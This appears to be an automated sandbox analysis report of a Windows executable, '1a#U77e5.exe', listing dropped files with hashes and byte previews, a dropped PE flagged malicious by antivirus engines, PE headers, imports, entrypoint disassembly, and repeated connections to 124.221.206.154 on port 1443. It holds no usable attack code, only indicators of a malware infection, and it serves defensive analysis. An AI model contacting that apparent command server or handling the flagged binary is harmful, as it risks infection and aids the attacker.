                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-05T07:55:52">.. Build: 16.0.15601.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 5 15:55:47 2022, mtime=Fri Aug 5 15:55:52 2022, atime=Fri Aug 5 15:55:47 2022, length=16768, window=hide
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1231
                                                                                                                          Entropy (8bit):5.014235188340708
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:81t6bU9G6CHihArh3GXqDkDlM8+WABe1OW7EO/ypaZFVW7LVW7KNDyffD4t2Y+x4:81ZArsUkDuPW7EOKqW7hW7ODyR7aB6m
                                                                                                                          MD5:355E58BF021D90BF3CCDCD8503F910A1
                                                                                                                          SHA1:34D3B542D1ABDD5B042B1BF790EEBD705899BFAC
                                                                                                                          SHA-256:F40C4F240348D97AB8EB36F2DAA14F896B297339E8E2581A84AEC5AB20AB7AFD
                                                                                                                          SHA-512:5A17937914179F6E98746DC8D45C82632DA16361A5E126E9403C74AC741E3D69FBF081B14FF1DDB7FDC4948C957ED0FDEBCB9C9B069D84069A21C6A4FB488A1F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:L..................F.... ...g.5...}-.8.../S.5....A...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...U......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....hT....user..>.......NM..U.......S.....................`..a.l.f.o.n.s.....~.1......U....Desktop.h.......NM..U.......Y..............>......"Y.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..A...U.. .6ADF~1.DOC..f.......U...U.............................V.sQ.N..V.SP[lQ.S._U\Q..~.[hQ;e2..o`N.v...w..d.o.c.x...........$.......$...5...........h...............>.S......C:\Users\user\Desktop\?????????????????????.docx.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.\.sQ.N..V.SP[lQ.S._U\Q..~.[hQ;e2..o`N.v...w..d.o.c.x.......1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.sQ.N..V.SP[lQ.S._U\Q..~.[hQ;e2..o`N.v...w..d.o.c.x.........:..,.LB.)...Aw...`.......X.......927537...........!a..%.H.VZAj.....s.........W...!a..%.H.VZAj..
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94
                                                                                                                          Entropy (8bit):3.408464248242645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:bDuMJlWt6lmxWLRt6lv:bCNkRS
                                                                                                                          MD5:113750065807DAD15C00A178EB21FC45
                                                                                                                          SHA1:903505EE9B97E1FA7F39E9B9ECE4DE9B286E9289
                                                                                                                          SHA-256:04AFC953D6AAE679A3ABDBE0FF0B8C144B16D4CCF84959A2793E57F6777AB8DF
                                                                                                                          SHA-512:1F89B0584EEB6381314116748832AF82310053B659721AD6A07041FEAAA8E03E1A0EAF4C5400E1BBBB415B4A678C2C20F788AB8A69A6E2BB06436FB8B7C2DF8B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:[folders]..Templates.LNK=0..?????????????????????.LNK=0..[misc]..?????????????????????.LNK=0..
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):162
                                                                                                                          Entropy (8bit):2.9237687128468073
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Rl/Zdn98Udk1+lllllzHLl+l/Lcalt13l/9l:RtZT8Uq0ll/Ml/V
                                                                                                                          MD5:8DCBD88C0E65C7ECD29DAE006EE77D62
                                                                                                                          SHA1:EC6B2ADD4B3D90DB15700AC4D17BD605A33C870F
                                                                                                                          SHA-256:B1895309312CB6286E97EE77C39BDF25D76C3298190EADB8DB26D487D2E3C7DF
                                                                                                                          SHA-512:876FAF0B0681079CFA978F84C0BA46318998807C29811E4874D166F66D1E6E241E2237AEB26498E823193885E05BCDA230C357A91B640C35204D031333ECDC2A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.pratesh................................................p.r.a.t.e.s.h.....L+....9i.0..............f.........q...5i.1.../........................1i.2..............
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):20
                                                                                                                          Entropy (8bit):2.8954618442383215
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:QVNliGn:Q9rn
                                                                                                                          MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                          SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                          SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                          SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                          Preview:..p.r.a.t.e.s.h.....
                                                                                                                          Process:C:\Users\user\Desktop\1a#U77e5.exe
                                                                                                                          File Type:Zip archive data, at least v1.0 to extract
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16768
                                                                                                                          Entropy (8bit):7.828953909266841
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:aYn7elOjZppldfDmfFPpT83uzRz/4id7miP9jT:aYnKlOjZPldfDMFPG+zRz5p
                                                                                                                          MD5:5F48BBB1AAC3B8D63AAAE3EC114BA340
                                                                                                                          SHA1:31FC3508AF156D67DA4BC6FE8D41206BDA5276EE
                                                                                                                          SHA-256:80596668ABC2C8C42481AD06713039198F08EB11C543061C3F9657A51248D04F
                                                                                                                          SHA-512:F5C3AF4E2269094C5381C512AE2A13C8204A34477DD47DB5D7ED4FC7BC986ECB36B2EF17B0A7470D1CB64404B8035CB7D27563C45E7F8E94FA92CFB9E3F6B9E8
                                                                                                                          Malicious:false
                                                                                                                          Preview:PK.........N.@................docProps/PK.........N.@...j...|.......docProps/app.xml.R.N.0..#..Q...-....'...@..r..Eb[.A..q^Q.Wn;3.x.c.......WF.R..4A-M..a.>7.."M|.....J....~y..g,...'.B.U.`....A.<.:*{..."t.b.{%.....u .......6.g...x...j..9../.......l/...c.>oM...Y..z>.r.`g\.y.,..F.;..qS.UU.dB....8..9M......<......o.|A.}?..R.X..|/z.@~..7.l.s7>.[.MN..T.V.1.,.Y'.....!V.w.m....W....r.fW......W.uVT.:...6[...hY.s.....@.N...|w*.9.2.q....PK.........N.@N..e............docProps/core.xml}..N.1...H.......$..Y$Z.T.J.*.........)\*.K...@j..K.y..q.+..I.A .3..7.x...4..u*3]D...`D&..t.a..vP.<7.......C{..V,r&2..l....\P..c"..9..!h........j...p...>......<..s\..&..R.....i...C...w.6(...`.{...l(...iew.-.X.O.....1nV6.......X..*S.....RT..=....u.S..~.%..hH....I..e.|..Z../.KVf...2....H........Ir.....t1...].~}.]....._.?|.........ySm[.@...B..I.O[l.....k@RZ.0R..K..N5.NT...<.PK.........N.@....'...........docProps/custom.xml...K.0....C.=....mG. .....4..MR.t:.............}.{..E..(..
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):162
                                                                                                                          Entropy (8bit):2.9237687128468073
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Rl/Zdn98Udk1+lllllzHLl+l/Lcalt13l/9l:RtZT8Uq0ll/Ml/V
                                                                                                                          MD5:8DCBD88C0E65C7ECD29DAE006EE77D62
                                                                                                                          SHA1:EC6B2ADD4B3D90DB15700AC4D17BD605A33C870F
                                                                                                                          SHA-256:B1895309312CB6286E97EE77C39BDF25D76C3298190EADB8DB26D487D2E3C7DF
                                                                                                                          SHA-512:876FAF0B0681079CFA978F84C0BA46318998807C29811E4874D166F66D1E6E241E2237AEB26498E823193885E05BCDA230C357A91B640C35204D031333ECDC2A
                                                                                                                          Malicious:false
                                                                                                                          Preview:.pratesh................................................p.r.a.t.e.s.h.....L+....9i.0..............f.........q...5i.1.../........................1i.2..............
                                                                                                                          Process:C:\Users\user\Desktop\1a#U77e5.exe
                                                                                                                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2062848
                                                                                                                          Entropy (8bit):6.989271790744726
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:VLG1BKsKoBqgde0DTIK2u4WXr3R0lgaWPPCwha1w0UHfLBamlNRDz:VLGKTZBermgaWPPCwha14/LR
                                                                                                                          MD5:84E3D79DA5E503374E61A17351781C14
                                                                                                                          SHA1:6C4710E5E6BC0F991C6954E64E76EC8BF796A2E1
                                                                                                                          SHA-256:6254E9F7F9E61A1A80E8A3C01757B8D29C9AC0EB0D596236FC0A2944FD44DFD6
                                                                                                                          SHA-512:B287D405B01AAA7B7C35AE1787395CCE626A4565B28BB74D2AA715D251D580AAB4EEE513D29885728B56F0175CB13238B6DCF0EC228DB83C6AC90CA7EEECC4D8
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........*..9....."..........Z......`.........@...............................%...........`... ...............................................#.|.............................$..%.................................................. Q..@............................text............................... ..`.rdata...#... ...$..................@..@.data........P...Z...:..............@.../4......'....P......................@..B/19.....=x...`...z..................@..B/32.....,I.......J..................@..B/46.....*....0.......Z..............@..B/65.....-....@.......\..............@..B/78.....I_...."..`...*..............@..B/90.....|r...p#..t..................@..B.idata..|.....#.....................@....reloc...%....$..&..................@..B.symtab..O...0$..P...*.................B........................................................................................
                                                                                                                          File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                          Entropy (8bit):6.725931255932212
                                                                                                                          TrID:
                                                                                                                          • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                          • DOS Executable Generic (2002/1) 12.50%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                          File name:1a#U77e5.exe
                                                                                                                          File size:4732928
                                                                                                                          MD5:3f2202e24ad0a66c08f88a18dd7b5fb4
                                                                                                                          SHA1:62df51eb1351279afa4dbe5920758d6974427ac9
                                                                                                                          SHA256:eb94cd39cde6a5270181d6e6788c69a2a90ab2b27f9236c8382e810e4dfead1d
                                                                                                                          SHA512:cd87c99ce09a29a5317343e04bb55fd63cd0b98cebcb08793a9b1dd275a9c6ce09c53fb7f901fc6083d8992360d3fbe02438d4143a907be64e7bdca15567bc27
                                                                                                                          SSDEEP:49152:BuZC3FJrb/TWvO90dL3BmAFd4A64nsfJ+WNq3v3MVkOHx3bEnnkY3Xw4g9MUth7A:aC3F0uKUrwUZ0
                                                                                                                          TLSH:2426BF333982B8FADAAD697184242D411D7CB88B172053C7BB4975FE36BA2D44D3C768
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........F.P....."..........~......@.........@..............................PN...........`... ............................
                                                                                                                          Icon Hash:554d5c5469694525
                                                                                                                          Entrypoint:0x45ca40
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:6
                                                                                                                          OS Version Minor:1
                                                                                                                          File Version Major:6
                                                                                                                          File Version Minor:1
                                                                                                                          Subsystem Version Major:6
                                                                                                                          Subsystem Version Minor:1
                                                                                                                          Import Hash:9cbefe68f395e67356e2a5d8d1b285c0
                                                                                                                          Instruction
                                                                                                                          jmp 00007FAA8CC452C0h
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          pushfd
                                                                                                                          cld
                                                                                                                          dec eax
                                                                                                                          sub esp, 000000E0h
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp], edi
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+08h], esi
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+10h], ebp
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+18h], ebx
                                                                                                                          dec esp
                                                                                                                          mov dword ptr [esp+20h], esp
                                                                                                                          dec esp
                                                                                                                          mov dword ptr [esp+28h], ebp
                                                                                                                          dec esp
                                                                                                                          mov dword ptr [esp+30h], esi
                                                                                                                          dec esp
                                                                                                                          mov dword ptr [esp+38h], edi
                                                                                                                          movups dqword ptr [esp+40h], xmm6
                                                                                                                          movups dqword ptr [esp+50h], xmm7
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+60h], xmm0
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+70h], xmm1
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+00000080h], xmm2
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+00000090h], xmm3
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+000000A0h], xmm4
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+000000B0h], xmm5
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+000000C0h], xmm6
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+000000D0h], xmm7
                                                                                                                          dec eax
                                                                                                                          sub esp, 30h
                                                                                                                          dec ecx
                                                                                                                          mov edi, eax
                                                                                                                          dec eax
                                                                                                                          mov edx, dword ptr [00000028h]
                                                                                                                          dec eax
                                                                                                                          cmp edx, 00000000h
                                                                                                                          jne 00007FAA8CC48F4Eh
                                                                                                                          dec eax
                                                                                                                          mov eax, 00000000h
                                                                                                                          jmp 00007FAA8CC48FC5h
                                                                                                                          dec eax
                                                                                                                          mov edx, dword ptr [edx+00000000h]
                                                                                                                          dec eax
                                                                                                                          cmp edx, 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4c6000 | 0x47c | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4e2000 | 0x2678 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4c7000 | 0x2b0a | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3cf140 | 0x140 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8fc6a | 0x8fe00 | False | 0.4675638710903562 | data | 6.177951506515494 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x91000 | 0x33d8f0 | 0x33da00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3cf000 | 0x720a0 | 0x17e00 | False | 0.35497791230366493 | data | 4.298912004398371 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
/4 | 0x442000 | 0x127 | 0x200 | False | 0.6171875 | data | 5.097874074212899 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19 | 0x443000 | 0x1d578 | 0x1d600 | False | 0.9987782579787234 | data | 7.993303104291631 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/32 | 0x461000 | 0x5b0b | 0x5c00 | False | 0.9890455163043478 | data | 7.917262410977086 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/46 | 0x467000 | 0x2a | 0x200 | False | 0.091796875 | data | 0.7534025800416837 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/65 | 0x468000 | 0x34e35 | 0x35000 | False | 0.9983048349056604 | data | 7.995735953621072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/78 | 0x49d000 | 0x1e401 | 0x1e600 | False | 0.9892698688271605 | data | 7.987159878797264 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/90 | 0x4bc000 | 0x977c | 0x9800 | False | 0.9757401315789473 | data | 7.788382558202588 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata | 0x4c6000 | 0x47c | 0x600 | False | 0.3313802083333333 | data | 3.514698326038637 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x4c7000 | 0x2b0a | 0x2c00 | False | 0.3710049715909091 | data | 5.397043934669771 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x4ca000 | 0x17c10 | 0x17e00 | False | 0.2733045647905759 | data | 5.119810305846417 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x4e2000 | 0x2678 | 0x2800 | False | 0.43115234375 | data | 5.682287008823302 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x4e20b8 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4280181209, next used block 4280181211 | English | United States
RT_GROUP_ICON | 0x4e4660 | 0x14 | data | English | United States
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                          Aug 5, 2022 09:56:25.793513060 CEST144349793124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:26.364763021 CEST497931443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:26.559653997 CEST144349793124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:27.067987919 CEST497931443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:27.262059927 CEST144349793124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:27.453006983 CEST498051443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:27.669214964 CEST144349805124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:28.239979029 CEST498051443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:28.455928087 CEST144349805124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:29.052509069 CEST498051443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:29.268527985 CEST144349805124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:29.495060921 CEST498101443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:29.720386982 CEST144349810124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:30.255779982 CEST498101443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:30.481199026 CEST144349810124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:31.068296909 CEST498101443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:31.292104006 CEST144349810124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:31.450253010 CEST498161443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:31.668453932 CEST144349816124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:32.255995035 CEST498161443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:32.475545883 CEST144349816124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:33.068542957 CEST498161443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:33.286715031 CEST144349816124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:33.424062014 CEST498211443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:33.625540972 CEST144349821124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:34.240472078 CEST498211443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:34.441996098 CEST144349821124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:35.053042889 CEST498211443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:35.255081892 CEST144349821124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:35.415158987 CEST498291443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:35.633347034 CEST144349829124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:36.240658045 CEST498291443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:36.458710909 CEST144349829124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:37.053587914 CEST498291443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:37.271845102 CEST144349829124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:37.714510918 CEST498341443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:37.932147026 CEST144349834124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:38.568979025 CEST498341443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:38.786777973 CEST144349834124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:39.365973949 CEST498341443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:39.585803032 CEST144349834124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:43.886779070 CEST498381443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:44.114943027 CEST144349838124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:44.685172081 CEST498381443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:44.914930105 CEST144349838124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:45.569644928 CEST498381443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:45.797305107 CEST144349838124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:45.949325085 CEST498421443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:46.156725883 CEST144349842124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:46.741535902 CEST498421443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:46.947873116 CEST144349842124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:47.554389954 CEST498421443192.168.2.5124.221.206.154
